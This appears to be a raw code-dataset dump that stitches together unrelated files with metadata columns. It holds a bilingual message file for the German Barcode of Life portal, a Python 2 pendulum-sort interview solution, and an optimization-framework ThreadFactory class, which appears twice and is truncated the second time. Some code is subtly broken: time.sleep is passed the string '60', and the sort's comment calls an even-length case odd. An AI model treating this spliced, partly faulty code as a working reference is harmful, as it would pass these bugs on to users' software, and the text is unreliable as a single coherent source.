'en': ["Europe",
"Baden-Württemberg",
"Bavaria",
"Berlin",
"Brandenburg",
"Bremen",
"Hamburg",
"Hesse",
"Mecklenburg-Vorpommern",
"Lower Saxony",
"North Rhine Westphalia",
"RhinelandPalatinate",
"Saarland",
"Saxony",
"Saxony-Anhalt",
"Schleswig-Holstein",
"Thuringia"]}
messages = {}
messages['results'] = {}
messages['results']['choose_taxa'] = {'de': '- Bitte wählen Sie ein Taxon aus -',
'en': '- Please choose a taxon -'}
messages['results']['choose_states'] = {'de': '- Bitte wählen Sie ein Bundesland aus -',
'en': '- Please choose a state -'}
messages['news_edit'] = {'de': ' Bearbeiten ', 'en': ' Edit '}
messages['news_reset'] = {'de': " Zurücksetzen ", 'en': " Reset "}
messages['news_reset_html'] = {'de': "<h2><strong>Titel</strong></h2><p>Inhalt</p>",
'en': "<h2><strong>Title</strong></h2><p>Content</p>"}
messages['news_message_saved'] = {'de': "News gespeichert!", 'en': "News saved!"}
messages['news_message_updated'] = {'de': "News bearbeitet!", 'en': "News updated!"}
messages['news_message_empty'] = {'de': "Bitte geben Sie Titel und Inhalt des neuen Newsbeitrages ein!",
'en': "Please enter title and content of the news posting!"}
messages['news_cancel'] = {'de': " Abbrechen ", 'en': " Cancel "}
messages['contact'] = {'de': 'Bitte überprüfen Sie die eingegebenen Daten.', 'en': 'Please check the data entered.'}
messages['contact_send'] = {'de': 'Die Mail wurde versandt!', 'en': 'Send mail was successful!'}
messages['letter_sender'] = {'de': 'Absender', 'en': 'Sender'}
messages['letter_send_to'] = {'de': 'Empfänger', 'en': 'Send to'}
messages['letter_order_no'] = {'de': 'Auftragsnummer {0}', 'en': 'Order no. {0}'}
messages['letter_no_samples'] = {'de': 'Anzahl Proben: {0}', 'en': 'No. samples: {0}'}
messages['letter_body1'] = {'de': 'Hinweis: Bitte drucken Sie das Anschreiben aus oder notieren Sie alternativ die ',
'en': 'Please print this cover letter or write the'}
messages['letter_body2'] = {'de': 'Auftragsnummer auf einem Zettel und legen diesen dem Probenpaket bei.',
'en': 'order number on a slip and send it together with your parcel '
'containing the samples.'}
messages['pls_select'] = {'de': 'Bitte wählen', 'en': 'Please select'}
messages['wrong_credentials'] = {'de': 'Falscher Benutzer oder Passwort!', 'en': 'Wrong user or password!'}
messages['still_locked'] = {'de': 'Sie wurden noch nicht von einem Koordinator freigeschaltet!',
'en': 'Your account must be unlocked by the Administrator!'}
messages['required_fields'] = {'de': 'Bitte alle Pflichtfelder ausfüllen!',
'en': 'Please fill out all required fields!'}
messages['username_present'] = {'de': 'Nutzername schon vorhanden, bitte wählen Sie einen anderen.',
'en': 'Username already present, please choose another one.'}
messages['user_created'] = {'de': 'Ihre Registrierungsanfrage wird bearbeitet. Sie werden in Kürze eine Email '
'Benachichtigung zum Stand Ihrer Freigabe für das GBOL Webportal erhalten.',
'en': 'User created. Please wait for unlock of your account by the administrator.'}
messages['reg_exp_mail_subject'] = {'de': 'Ihre Registrierung beim GBOL Webportal',
'en': 'Your Registration at GBOL Webportal'}
messages['reg_exp_mail_body'] = {'de': 'Hallo {salutation} {title} {vorname} {nachname},\n\n'
'wir haben Ihre Registrierung für die taxonomische Expertise {expertisename} '
'erhalten und an die entsprechenden Koordinatoren weitergeleitet.\n\n'
'Viele Grüße\nIhr GBOL Team',
'en': 'Hello {salutation} {title} {vorname} {nachname},\n\n'
'We have received Your registration for the taxonomic expertise {3} and '
'have send them to the corresponding GBOL-taxon coordinators.\n\n'
'Best regards,\nYour GBOL team'}
messages['reg_exp_chg_mail_body'] = {'de': 'Hallo {tk_user},\n\n{req_user} hat sich für die Expertise {expertisename} '
'registriert.\nBitte prüfen Sie die Angaben und zertifizieren die '
'Expertise anschließend.\n\nViele Grüße\nIhr GBOL Team',
'en': 'Hello {tk_user},\n\n{req_user} applies for the taxonomic expertise '
'{expertisename}.\nPlease check the data and approve or decline the request.'
'\n\nBest regards, Your GBOL team'}
messages['reg_exp_accept'] = {'de': """Hallo {3} {1} {2},
die Expertise {0} in Ihrem GBOL Konto wurde erfolgreich von einem Koordinator freigegeben.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {3} {1} {2}
The expertise {0} of your GBOL account has been approved by the coordinator.
Best regards,
The GBOL Team
"""}
messages['reg_exp_decline'] = {'de': """Hallo {3} {1} {2},
die Expertise {0} in Ihrem GBOL Konto wurde von einem Koordinator abgelehnt.
Sie können sich bei Fragen im Kontakt-Bereich bei uns melden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {3} {1} {2}
The expertise {0} of your GBOL account has been refused by the coordinator.
If You have any questions regarding the GBOL approval process, please send us a note in the contact area.
We will answer Your inquiry as soon as possible.
Best regards,
The GBOL Team
"""}
messages['pwd_forgot_email_body'] = {'de': """{0},
eine Anfrage zum Zurücksetzen des Passworts für Ihr Benutzerkonto auf
dem German Barcode of Life Webportal wurde gestellt.
Sie können Ihr Passwort mit einem Klick auf folgenden Link ändern:
http://{1}/sammeln/change-password?link={2}
Ihr Benutzername lautet: {3}
Dieser Link kann nur einmal verwendet werden und leitet Sie zu einer Seite,
auf der Sie ein neues Passwort festlegen können. Er ist einen Tag lang gültig
und läuft automatisch aus, falls Sie ihn nicht verwenden.
Viele Grüße
Das Team von German Barcode of Life""",
'en': """{0},
a request for password reset for your useraccount on the
German Barcode of Life webportal has been posed.
You can change your password with the following link:
http://{1}/sammeln/change-password?link={2}
Your user name is: {3}
Please note: this link can only be used once. The link will direct you to a
website where you can enter a new password.
The link is valid for one day.
Best wishes,
Your team from German Barcode of Life"""}
messages['pwd_forgot_email_subject'] = {'de': 'Neue Login-Daten für {0} auf German Barcode of Life',
'en': 'New login data for your user {0} on German Barcode of '
'Life webportal'}
messages['pwd_forgot_sent'] = {'de': 'Das Passwort und weitere Hinweise wurden an '
'die angegebene Email-Adresse gesendet.',
'en': 'The password and further tips werde sent to your email address.'}
messages['pwd_forgot_not_found'] = {'de': 'Es wurde kein Benutzer mit eingegebenem Namen bzw. Email gefunden.',
'en': 'No user found with the name or the email entered.'}
messages['pwd_unmatch'] = {'de': 'Die beiden Passwörter stimmen nicht überein.', 'en': 'Passwords do not match.'}
messages['pwd_saved'] = {'de': 'Neues Passwort gespeichert.', 'en': 'New password saved'}
messages['pwd__link_used'] = {'de': 'Link wurde bereits benutzt.', 'en': 'The link has been used already'}
messages['pwd__link_invalid'] = {'de': 'Kein gültiger Link.', 'en': 'Link invalid'}
messages['pwd__link_timeout'] = {'de': 'Link ist nicht mehr gültig.', 'en': 'Link has timed out'}
messages['order_success'] = {'de': 'Danke, Ihre Bestellung wurde entgegengenommen.',
'en': 'Thank You, the order has been received.'}
messages['order_info_missing'] = {'de': 'Bitte füllen Sie alle Felder aus.', 'en': 'Please fill out all fields.'}
messages['edt_no_passwd'] = {'de': 'Bitte geben Sie Ihr Passwort an, um das Benutzerprofil zu ändern.',
'en': 'Please provide your password in order to change the userprofile.'}
messages['edt_passwd_wrong'] = {'de': 'Falsches Passwort.', 'en': 'Wrong password.'}
messages['edt_passwd_mismatch'] = {'de': 'Die beiden neuen Passwörter stimmen nicht überein.',
'en': 'Both new passwords do not match.'}
messages['edt_success'] = {'de': 'Benutzerprofil erfolgreich geändert', 'en': 'Userprofile updated.'}
messages['err_upload'] = {'de': 'Ein Fehler ist beim Hochladen der Sammeltabelle aufgetreten. '
'Bitte schicken Sie Ihre Sammeltabelle per E-Mail an den Taxonkoordinator.',
'en': 'An error occured when uploading the collection sheet. Please sent it to the '
'taxon coordinator via e-mail.'}
messages['succ_upload'] = {'de': 'Die Sammeltabelle wurde erfolgreich hochgeladen!',
'en': 'Collection sheet uploaded successfully!'}
messages['download'] = {'de': 'Herunterladen', 'en': 'Download'}
messages['cert'] = {'de': 'zertifiziert', 'en': 'certified'}
messages['subm'] = {'de': 'beantragt', 'en': 'submitted'}
messages['select'] = {'de': 'Auswahl', 'en': 'Please select'}
messages['robot'] = {'de': 'Registrierung konnte nicht durchgeführt werden!', 'en': 'Could not process registration!'}
messages['email_reg_subject'] = {'de': 'GBOL Registrierung', 'en': 'GBOL Registration'}
messages['email_reg_body'] = {'de': """"Hallo {4} {2} {3}
ihr GBOL Konto {0} wurde erfolgreich von einem Koordinator freigegeben.
Sie können sich nun im dem Experten-Bereich anmelden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {4} {2} {3}
Your GBOL account has been approved by the coordinator.
You can now login into the expert area.
Best regards,
The GBOL Team
"""}
messages['email_reg_body_decline'] = {'de': """"Hallo {4} {2} {3}
ihr GBOL Konto {0} wurde von einem Koordinator abgelehnt.
Sie können sich bei Fragen im Kontakt-Bereich von GBOL bei uns melden.
Best regards,
Ihr GBOL Team
""", 'en': """Hello {4} {2} {3}
Your GBoL account has been refused by the coordinator.
If You have any questions regarding the GBoL approval process, please send us a note in the contact area.
We will answer Your inquiry as soon as possible.
Best regards,
The GBOL Team
"""}
messages['states'] = {'de': {'raw': 'Neu', 'cooking': 'in Arbeit', 'done': 'Fertig'},
'en': {'raw': 'New', 'cooking': 'in progress', 'done': 'Done'}}
messages['error'] = {'de': 'Keine Ergebnisse gefunden', 'en': 'Nothing found'}
messages['coord'] = {'de': 'Koordinaten (lat/lon)', 'en': 'Coordinates (lat/lon)'}
messages['taxon'] = {'de': 'Taxon', 'en': 'Higher taxon'}
messages['ncoll'] = {'en': 'Not Collected', 'de': 'Nicht gesammelt'}
messages['nbar'] = {'en': 'No Barcode', 'de': 'Kein Barcode'}
messages['barc'] = {'en': 'Barcode', 'de': 'Barcode'}
messages['pub_updated'] = {'en': 'Publication updated!', 'de': 'Publikation bearbeitet!'}
messages['pub_saved'] = {'en': 'Publication saved!', 'de': 'Publikation gespeichert!'}
messages['pub_error'] = {'en': 'Please enter title and content of the publications posting!',
'de': 'Bitte geben Sie Titel und Inhalt des neuen Publikationsbeitrages ein!'}
messages['mail_req_body'] = """Guten Tag {0},
eine Bestellung für Versandmaterial wurde auf dem GBOL-Portal abgesendet.
Gesendet am {1}
Bestellung:
Material: {2}
Anzahl Verpackungseinheiten: {3}
Taxonomische Gruppe: {4}
Nummer erstes Sammelröhrchen: {5}
Nummer letztes Sammelröhrchen: {6}
Absender:
{name}
{street}
{city}
{country}
Email: {email}
"""
# -- In case of an error one of these messages are send to the dev_group specified in production.ini
messages['error'] = {}
messages['error']['order_processing'] = """
Eine Bestellung für Versandmaterial konnte nicht verarbeitet werden:
Bestellzeit: {1}
Koordinator (User-id): {0}
Möglicher Trasaktions-Key: {9}
Bestellung:
Material: {2}
Anzahl Verpackungseinheiten: {3}
Taxonomische Gruppe (ID): {4}
Nummer erstes Sammelröhrchen: {5}
Nummer letztes Sammelröhrchen: {6}
Bestellt von:
User-ID: {7}
Name: {8}
Fehler:
{10}
"""
| de | 0.824417 | 100408, 100430, 100431, 100451, 100453, 3000243, 3100522, 3200125, 3200126, 4000014, 4402020, 4403366, 4403382, 4403383, 4404012, 4404135, 4404679, 4405947, 4406565, 4407062, 4408012, 5000093, 5000095, 5000203, 5009403, 5009532, 5100497, 5200013, 5210014, 5220011, 5400004, 5401236, 5413793, 5416518, 5416650, 5426341, 5428084, 5428327, 5428727, 5428849, 5428977, 5429029, 5429176, 5429405, 5430460, 5431215 Hallo {3} {1} {2}, die Expertise {0} in Ihrem GBOL Konto wurde erfolgreich von einem Koordinator freigegeben. Viele Grüße Ihr GBOL Team Hello {3} {1} {2} The expertise {0} of your GBOL account has been approved by the coordinator. Best regards, The GBOL Team Hallo {3} {1} {2}, die Expertise {0} in Ihrem GBOL Konto wurde von einem Koordinator abgelehnt. Sie können sich bei Fragen im Kontakt-Bereich bei uns melden. Viele Grüße Ihr GBOL Team Hello {3} {1} {2} The expertise {0} of your GBOL account has been refused by the coordinator. If You have any questions regarding the GBOL approval process, please send us a note in the contact area. We will answer Your inquiry as soon as possible. Best regards, The GBOL Team {0}, eine Anfrage zum Zurücksetzen des Passworts für Ihr Benutzerkonto auf dem German Barcode of Life Webportal wurde gestellt. Sie können Ihr Passwort mit einem Klick auf folgenden Link ändern: http://{1}/sammeln/change-password?link={2} Ihr Benutzername lautet: {3} Dieser Link kann nur einmal verwendet werden und leitet Sie zu einer Seite, auf der Sie ein neues Passwort festlegen können. Er ist einen Tag lang gültig und läuft automatisch aus, falls Sie ihn nicht verwenden. Viele Grüße Das Team von German Barcode of Life {0}, a request for password reset for your useraccount on the German Barcode of Life webportal has been posed. You can change your password with the following link: http://{1}/sammeln/change-password?link={2} Your user name is: {3} Please note: this link can only be used once. The link will direct you to a website where you can enter a new password. The link is valid for one day. Best wishes, Your team from German Barcode of Life "Hallo {4} {2} {3} ihr GBOL Konto {0} wurde erfolgreich von einem Koordinator freigegeben. Sie können sich nun im dem Experten-Bereich anmelden. Viele Grüße Ihr GBOL Team Hello {4} {2} {3} Your GBOL account has been approved by the coordinator. You can now login into the expert area. Best regards, The GBOL Team "Hallo {4} {2} {3} ihr GBOL Konto {0} wurde von einem Koordinator abgelehnt. Sie können sich bei Fragen im Kontakt-Bereich von GBOL bei uns melden. Best regards, Ihr GBOL Team Hello {4} {2} {3} Your GBoL account has been refused by the coordinator. If You have any questions regarding the GBoL approval process, please send us a note in the contact area. We will answer Your inquiry as soon as possible. Best regards, The GBOL Team Guten Tag {0}, eine Bestellung für Versandmaterial wurde auf dem GBOL-Portal abgesendet. Gesendet am {1} Bestellung: Material: {2} Anzahl Verpackungseinheiten: {3} Taxonomische Gruppe: {4} Nummer erstes Sammelröhrchen: {5} Nummer letztes Sammelröhrchen: {6} Absender: {name} {street} {city} {country} Email: {email} # -- In case of an error one of these messages are send to the dev_group specified in production.ini Eine Bestellung für Versandmaterial konnte nicht verarbeitet werden: Bestellzeit: {1} Koordinator (User-id): {0} Möglicher Trasaktions-Key: {9} Bestellung: Material: {2} Anzahl Verpackungseinheiten: {3} Taxonomische Gruppe (ID): {4} Nummer erstes Sammelröhrchen: {5} Nummer letztes Sammelröhrchen: {6} Bestellt von: User-ID: {7} Name: {8} Fehler: {10} | 1.907279 | 2 |
challenges/Backend Challenge/pendulum_sort.py | HernandezDerekJ/Interview | 0 | 9140 | """
Coderpad solution
"""
def pend(arr):
## arr = [2,3,5,1,4]
## vrr = [0,0,0,0,0]
var = [0] * len(arr)
mid = (len(var) - 1) / 2
## sort_arr = [1,2,3,4,5]
## vrr = [0,0,1,0,0]
sort_arr = sorted(arr)
var[mid] = sort_arr[0]
# ^
# focus shouldn't be at beginning ofr array [1',2,3,4,5]
# ^
# it should be mid [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
# Now it can be flipped left and right for ever increment
# ^ ^
# sort_arr [1,2,3,4,5]
# ^ ^
# var [0,0,1,0,0]
arr_increment = 1
for i in range(1, mid + 1):
#By now the mid is the only position that is correct
#As we parse through var[], we also parse through arr[] and flip values from least to greatest
# ^
# sort_arr [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
var[mid+i] = sort_arr[arr_increment]
arr_increment += 1
# ^
# sort_arr [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
var[mid-i] = sort_arr[arr_increment]
arr_increment += 1
#Odd number of elements
if ((len(sort_arr)-1) % 2 == 1):
# ^
# sort_arr [1,2,3,4,5,6]
# ^
# var [0,0,1,0,0,0]
var[len(arr) - 1] = sort_arr[len(arr) - 1]
print var
if __name__ == "__main__":
arr = [5,1,3,6,2,4]
pend(arr)
arr = [5, 1, 3, 2, 4]
pend(arr)
arr = [10, 4, 1, 5, 4, 3, 7, 9]
pend(arr)
| """
Coderpad solution
"""
def pend(arr):
## arr = [2,3,5,1,4]
## vrr = [0,0,0,0,0]
var = [0] * len(arr)
mid = (len(var) - 1) / 2
## sort_arr = [1,2,3,4,5]
## vrr = [0,0,1,0,0]
sort_arr = sorted(arr)
var[mid] = sort_arr[0]
# ^
# focus shouldn't be at beginning ofr array [1',2,3,4,5]
# ^
# it should be mid [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
# Now it can be flipped left and right for ever increment
# ^ ^
# sort_arr [1,2,3,4,5]
# ^ ^
# var [0,0,1,0,0]
arr_increment = 1
for i in range(1, mid + 1):
#By now the mid is the only position that is correct
#As we parse through var[], we also parse through arr[] and flip values from least to greatest
# ^
# sort_arr [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
var[mid+i] = sort_arr[arr_increment]
arr_increment += 1
# ^
# sort_arr [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
var[mid-i] = sort_arr[arr_increment]
arr_increment += 1
#Odd number of elements
if ((len(sort_arr)-1) % 2 == 1):
# ^
# sort_arr [1,2,3,4,5,6]
# ^
# var [0,0,1,0,0,0]
var[len(arr) - 1] = sort_arr[len(arr) - 1]
print var
if __name__ == "__main__":
arr = [5,1,3,6,2,4]
pend(arr)
arr = [5, 1, 3, 2, 4]
pend(arr)
arr = [10, 4, 1, 5, 4, 3, 7, 9]
pend(arr)
| en | 0.778519 | Coderpad solution ## arr = [2,3,5,1,4] ## vrr = [0,0,0,0,0] ## sort_arr = [1,2,3,4,5] ## vrr = [0,0,1,0,0] # ^ # focus shouldn't be at beginning ofr array [1',2,3,4,5] # ^ # it should be mid [1,2,3,4,5] # ^ # var [0,0,1,0,0] # Now it can be flipped left and right for ever increment # ^ ^ # sort_arr [1,2,3,4,5] # ^ ^ # var [0,0,1,0,0] #By now the mid is the only position that is correct #As we parse through var[], we also parse through arr[] and flip values from least to greatest # ^ # sort_arr [1,2,3,4,5] # ^ # var [0,0,1,0,0] # ^ # sort_arr [1,2,3,4,5] # ^ # var [0,0,1,0,0] #Odd number of elements # ^ # sort_arr [1,2,3,4,5,6] # ^ # var [0,0,1,0,0,0] | 3.44496 | 3 |
swagger_server/controllers/threadFactory.py | garagonc/optimization-framework | 0 | 9141 | <gh_stars>0
import os
import configparser
import json
import time
from IO.inputConfigParser import InputConfigParser
from IO.redisDB import RedisDB
from optimization.ModelException import MissingKeysException
from optimization.controllerDiscrete import OptControllerDiscrete
from optimization.controllerMpc import OptControllerMPC
from optimization.controllerStochasticTestMulti import OptControllerStochastic
#from optimization.controllerStochasticTestPebble import OptControllerStochastic
from prediction.machineLearning import MachineLearning
from prediction.prediction import Prediction
from prediction.pvPrediction import PVPrediction
from utils_intern.constants import Constants
from utils_intern.messageLogger import MessageLogger
class ThreadFactory:
def __init__(self, model_name, control_frequency, horizon_in_steps, dT_in_seconds, repetition, solver, id,
optimization_type, single_ev, restart):
self.id = id
self.logger = MessageLogger.get_logger(__name__, id)
self.model_name = model_name
self.control_frequency = control_frequency
self.horizon_in_steps = horizon_in_steps
self.dT_in_seconds = dT_in_seconds
self.repetition = repetition
self.solver = solver
self.optimization_type = optimization_type
self.single_ev = single_ev
self.redisDB = RedisDB()
self.pyro_mip_server = None
#restart = True
self.restart = restart
def getFilePath(self, dir, file_name):
# print(os.path.sep)
# print(os.environ.get("HOME"))
project_dir = os.path.dirname(os.path.realpath(__file__))
data_file = os.path.join("/usr/src/app", dir, file_name)
return data_file
def startOptControllerThread(self):
self.logger.info("Creating optimization controller thread")
self.logger.info("Number of repetitions: " + str(self.repetition))
self.logger.info("Output with the following control_frequency: " + str(self.control_frequency))
self.logger.info("Optimization calculated with the following horizon_in_steps: " + str(self.horizon_in_steps))
self.logger.info("Optimization calculated with the following dT_in_seconds: " + str(self.dT_in_seconds))
self.logger.info("Optimization calculated with the following model: " + self.model_name)
self.logger.info("Optimization calculated with the following solver: " + self.solver)
self.logger.info("Optimization calculated with the following optimization_type: " + self.optimization_type)
self.redisDB.set("Error mqtt" + self.id, False)
#self.logger.debug("Error mqtt " + str(self.redisDB.get("Error mqtt" + self.id)))
# Creating an object of the configuration file (standard values)
try:
config = configparser.RawConfigParser()
config.read(self.getFilePath("optimization/resources", "ConfigFile.properties"))
except Exception as e:
self.logger.error(e)
# Loads the solver name if it was not given thorough the endpoint command/start/id
if not self.model_name:
self.model_name = config.get("SolverSection", "model.name")
self.logger.debug("This is the model name: " + self.model_name)
self.model_path = os.path.join(config.get("SolverSection", "model.base.path"), self.model_name) + ".py"
self.logger.debug("This is the path of the model: " + str(self.model_path))
# Loads the solver name if not specified in command/start/id
if not self.solver:
self.solver_name = config.get("SolverSection", "solver.name")
else:
self.solver_name = self.solver
self.logger.debug("Optimization calculated with the following solver: " + self.solver_name)
##############################################################################################
output_config = None
try:
# Reads the registry/output and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Output.registry.mqtt")
if not os.path.exists(path):
self.logger.debug("Output.registry.mqtt not set, only file output available")
else:
with open(path, "r") as file:
output_config = json.loads(file.read())
except Exception as e:
self.logger.error("Output.registry.mqtt not set, only file output available")
try:
# Reads the registry/input and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Input.registry.file")
if not os.path.exists(path):
input_config_file = {}
self.logger.debug("Not Input.registry.file present")
else:
with open(path, "r") as file:
input_config_file = json.loads(file.read())
self.logger.debug("Input.registry.file found")
except Exception as e:
self.logger.error("Input file not found")
input_config_file = {}
self.logger.error(e)
try:
# Reads the registry/input and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Input.registry.mqtt")
if not os.path.exists(path):
input_config_mqtt = {}
self.logger.debug("Not Input.registry.mqtt present")
else:
with open(path, "r") as file:
input_config_mqtt = json.loads(file.read())
self.logger.debug("Input.registry.mqtt found")
except Exception as e:
self.logger.error("Input file not found")
input_config_mqtt = {}
self.logger.error(e)
persist_base_path = config.get("IO", "persist.base.file.path")
persist_base_path = os.path.join(os.getcwd(), persist_base_path, str(self.id), Constants.persisted_folder_name)
input_config_parser = InputConfigParser(input_config_file, input_config_mqtt, self.model_name, self.id,
self.optimization_type, persist_base_path, self.restart)
missing_keys = input_config_parser.check_keys_for_completeness()
if len(missing_keys) > 0:
raise MissingKeysException("Data source for following keys not declared: " + str(missing_keys))
opt_values = input_config_parser.get_optimization_values()
self.redisDB.set(self.id+":opt_values", json.dumps(opt_values))
self.prediction_threads = {}
self.prediction_names = input_config_parser.get_prediction_names()
if self.prediction_names is not None and len(self.prediction_names) > 0:
for prediction_name in self.prediction_names:
flag = input_config_parser.get_forecast_flag(prediction_name)
if flag:
self.logger.info("Creating prediction controller thread for topic " + str(prediction_name))
topic_param = input_config_parser.get_params(prediction_name)
parameters = json.dumps(
{"control_frequency": self.control_frequency, "horizon_in_steps": self.horizon_in_steps,
"topic_param": topic_param, "dT_in_seconds": self.dT_in_seconds, "type": "load"})
self.redisDB.set("train:" + self.id + ":" + prediction_name, parameters)
opt_values = input_config_parser.get_optimization_values()
self.prediction_threads[prediction_name] = Prediction(config, self.control_frequency,
self.horizon_in_steps, prediction_name,
topic_param, self.dT_in_seconds, self.id,
output_config, "load", opt_values)
self.prediction_threads[prediction_name].start()
self.pv_lstm_names = input_config_parser.get_pv_lstm_names()
if self.pv_lstm_names is not None and len(self.pv_lstm_names) > 0:
for pv_lstm_name in self.pv_lstm_names:
flag = input_config_parser.get_forecast_flag(pv_lstm_name)
if flag:
self.logger.info("Creating pv lstm controller thread for topic " + str(pv_lstm_name))
topic_param = input_config_parser.get_params(pv_lstm_name)
parameters = json.dumps(
{"control_frequency": self.control_frequency, "horizon_in_steps": self.horizon_in_steps,
"topic_param": topic_param, "dT_in_seconds": self.dT_in_seconds, "type": "pv"})
self.redisDB.set("train:" + self.id + ":" + pv_lstm_name, parameters)
opt_values = input_config_parser.get_optimization_values()
self.prediction_threads[pv_lstm_name] = Prediction(config, self.control_frequency,
self.horizon_in_steps, pv_lstm_name,
topic_param, self.dT_in_seconds, self.id,
output_config, "pv", opt_values)
self.prediction_threads[pv_lstm_name].start()
self.non_prediction_threads = {}
self.non_prediction_names = input_config_parser.get_pv_prediction_names()
if self.non_prediction_names is not None and len(self.non_prediction_names) > 0:
for non_prediction_name in self.non_prediction_names:
flag = input_config_parser.get_forecast_flag(non_prediction_name)
if flag:
self.non_prediction_threads[non_prediction_name] = PVPrediction(config, output_config,
input_config_parser,
self.id,
self.control_frequency,
self.horizon_in_steps,
self.dT_in_seconds,
non_prediction_name)
self.non_prediction_threads[non_prediction_name].start()
# Initializing constructor of the optimization controller thread
if self.optimization_type == "MPC":
self.opt = OptControllerMPC(self.id, self.solver_name, self.model_path, self.control_frequency,
self.repetition, output_config, input_config_parser, config,
self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type)
elif self.optimization_type == "discrete":
self.opt = OptControllerDiscrete(self.id, self.solver_name, self.model_path, self.control_frequency,
self.repetition, output_config, input_config_parser, config,
self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type)
elif self.optimization_type == "stochastic":
self.opt = OptControllerStochastic(self.id, self.solver_name, self.model_path,
self.control_frequency, self.repetition, output_config,
input_config_parser, config, self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type, self.single_ev)
try:
####starts the optimization controller thread
self.logger.debug("Mqtt issue " + str(self.redisDB.get("Error mqtt" + self.id)))
if "False" in self.redisDB.get("Error mqtt" + self.id):
self.opt.start()
self.logger.debug("Optimization object started")
return 0
else:
self.redisDB.set("run:" + self.id, "stopping")
self.stopOptControllerThread()
self.redisDB.set("run:" + self.id, "stopped")
self.logger.error("Optimization object could not be started")
return 2
except Exception as e:
self.logger.error(e)
return 1
def stopOptControllerThread(self):
try:
# stop as per ID
for name, obj in self.prediction_threads.items():
self.redisDB.remove("train:" + self.id + ":" + name)
obj.Stop()
for name, obj in self.non_prediction_threads.items():
obj.Stop()
self.logger.info("Stopping optimization controller thread")
self.opt.Stop()
self.logger.info("Optimization controller thread stopped")
return "Optimization controller thread stopped"
except Exception as e:
self.logger.error(e)
return e
def is_running(self):
return not self.opt.get_finish_status()
def update_training_params(self, key, parameters):
while True:
self.redisDB.set(key, parameters)
time.sleep("60")
| import os
import configparser
import json
import time
from IO.inputConfigParser import InputConfigParser
from IO.redisDB import RedisDB
from optimization.ModelException import MissingKeysException
from optimization.controllerDiscrete import OptControllerDiscrete
from optimization.controllerMpc import OptControllerMPC
from optimization.controllerStochasticTestMulti import OptControllerStochastic
#from optimization.controllerStochasticTestPebble import OptControllerStochastic
from prediction.machineLearning import MachineLearning
from prediction.prediction import Prediction
from prediction.pvPrediction import PVPrediction
from utils_intern.constants import Constants
from utils_intern.messageLogger import MessageLogger
class ThreadFactory:
def __init__(self, model_name, control_frequency, horizon_in_steps, dT_in_seconds, repetition, solver, id,
optimization_type, single_ev, restart):
self.id = id
self.logger = MessageLogger.get_logger(__name__, id)
self.model_name = model_name
self.control_frequency = control_frequency
self.horizon_in_steps = horizon_in_steps
self.dT_in_seconds = dT_in_seconds
self.repetition = repetition
self.solver = solver
self.optimization_type = optimization_type
self.single_ev = single_ev
self.redisDB = RedisDB()
self.pyro_mip_server = None
#restart = True
self.restart = restart
def getFilePath(self, dir, file_name):
# print(os.path.sep)
# print(os.environ.get("HOME"))
project_dir = os.path.dirname(os.path.realpath(__file__))
data_file = os.path.join("/usr/src/app", dir, file_name)
return data_file
def startOptControllerThread(self):
self.logger.info("Creating optimization controller thread")
self.logger.info("Number of repetitions: " + str(self.repetition))
self.logger.info("Output with the following control_frequency: " + str(self.control_frequency))
self.logger.info("Optimization calculated with the following horizon_in_steps: " + str(self.horizon_in_steps))
self.logger.info("Optimization calculated with the following dT_in_seconds: " + str(self.dT_in_seconds))
self.logger.info("Optimization calculated with the following model: " + self.model_name)
self.logger.info("Optimization calculated with the following solver: " + self.solver)
self.logger.info("Optimization calculated with the following optimization_type: " + self.optimization_type)
self.redisDB.set("Error mqtt" + self.id, False)
#self.logger.debug("Error mqtt " + str(self.redisDB.get("Error mqtt" + self.id)))
# Creating an object of the configuration file (standard values)
try:
config = configparser.RawConfigParser()
config.read(self.getFilePath("optimization/resources", "ConfigFile.properties"))
except Exception as e:
self.logger.error(e)
# Loads the solver name if it was not given thorough the endpoint command/start/id
if not self.model_name:
self.model_name = config.get("SolverSection", "model.name")
self.logger.debug("This is the model name: " + self.model_name)
self.model_path = os.path.join(config.get("SolverSection", "model.base.path"), self.model_name) + ".py"
self.logger.debug("This is the path of the model: " + str(self.model_path))
# Loads the solver name if not specified in command/start/id
if not self.solver:
self.solver_name = config.get("SolverSection", "solver.name")
else:
self.solver_name = self.solver
self.logger.debug("Optimization calculated with the following solver: " + self.solver_name)
##############################################################################################
output_config = None
try:
# Reads the registry/output and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Output.registry.mqtt")
if not os.path.exists(path):
self.logger.debug("Output.registry.mqtt not set, only file output available")
else:
with open(path, "r") as file:
output_config = json.loads(file.read())
except Exception as e:
self.logger.error("Output.registry.mqtt not set, only file output available")
try:
# Reads the registry/input and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Input.registry.file")
if not os.path.exists(path):
input_config_file = {}
self.logger.debug("Not Input.registry.file present")
else:
with open(path, "r") as file:
input_config_file = json.loads(file.read())
self.logger.debug("Input.registry.file found")
except Exception as e:
self.logger.error("Input file not found")
input_config_file = {}
self.logger.error(e)
try:
# Reads the registry/input and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Input.registry.mqtt")
if not os.path.exists(path):
input_config_mqtt = {}
self.logger.debug("Not Input.registry.mqtt present")
else:
with open(path, "r") as file:
input_config_mqtt = json.loads(file.read())
self.logger.debug("Input.registry.mqtt found")
except Exception as e:
self.logger.error("Input file not found")
input_config_mqtt = {}
self.logger.error(e)
persist_base_path = config.get("IO", "persist.base.file.path")
persist_base_path = os.path.join(os.getcwd(), persist_base_path, str(self.id), Constants.persisted_folder_name)
input_config_parser = InputConfigParser(input_config_file, input_config_mqtt, self.model_name, self.id,
self.optimization_type, persist_base_path, self.restart)
missing_keys = input_config_parser.check_keys_for_completeness()
if len(missing_keys) > 0:
